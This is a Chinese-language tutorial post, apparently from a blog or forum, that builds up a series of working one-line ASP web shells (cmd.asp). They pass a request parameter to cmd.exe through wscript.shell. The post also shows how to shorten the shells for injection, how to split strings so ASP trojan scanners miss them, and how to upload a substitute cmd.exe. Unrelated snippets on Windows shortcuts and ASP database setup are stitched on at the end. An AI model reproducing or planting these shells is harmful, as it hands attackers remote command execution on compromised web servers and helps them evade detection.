第乙個,來看zzzeva免fso的cmd.asp
**如下:
是不是覺得有點長了?在注入時寫有點不好寫。那來改一下。
第二個,更改zzzeva免fso的cmd.asp
**如下:
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
用法是xx.asp?cmd=net user
這樣是為了得到結果排得方便,其實如果不為美觀,還可以更短,那來第三個
第三個,縮短的cmd.asp
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
這裡用了response.write,變數用了cmd。為什麼不更短呢?
第四個,更短的cmd.asp
<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>
好像這就是最短的了。除了短,我們還要在別的地方下功夫。
第五個,wscript.shell被改名怎麼辦?
**:<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
當然,classid值在不同系統下有所不同。這個要自行更改
第六個,被一些殺asp木馬的軟體檢測出來怎麼辦?
把變數拆開呀。**:
<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>
或<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>
這裡**引號裡的東東都可以隨便拆的,像還可以拆成
<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%>
第7個,cmd.exe不讓呼叫怎麼辦?
這個你自己上傳乙個cmd.exe,放在乙個可以呼叫的目錄下,**更改如下:
<%=server.createobject("wscript.shell").exec("e:\aspx\cmd.exe /c "&request("c")).stdout.readall%>
第8個,asp**可以加密嗎?
當然可以了
cmd 執行命令
一 一鍵開啟執行 開啟 執行 視窗,都是通過 開始 選單中的命令來完成的。其實我們可以為執行建立乙個快捷方式,一鍵開啟執行視窗。右擊桌面上的快捷方式,開啟屬性視窗。切換到 快捷鍵 方式選項卡,在 快捷鍵 裡面輸入乙個按鍵,然後單擊 確定 按鈕,這樣我們要開啟執行視窗時只需要按下該快捷鍵即可。二 快速...
ASP執行環境
一 建立 asp 執行環境 首先建立乙個空的目錄,在你喜歡的位置,假設是 d websvr。將 netbox.exe 複製到這個目錄,然後在目錄中創 上面的 摘自 建立乙個 web 伺服器 其中加粗的部分是預設檔名,如果你的應用不同,可以自行新增修 改。二 複製 asp 應用 在目錄中再建立乙個子目...
asp連線access例項
一直想建乙個自己的小 可是jsp空間昂貴,還是asp的吧。找啦許多cms,學習成本太高,於是非下決心學習一下。先看乙個連線資料庫的,能連資料庫了,其它的都ok了。首先,建一目錄如 d asp test,三個檔案db.mdb,conn.asp,showdata.asp。conn.asp set con...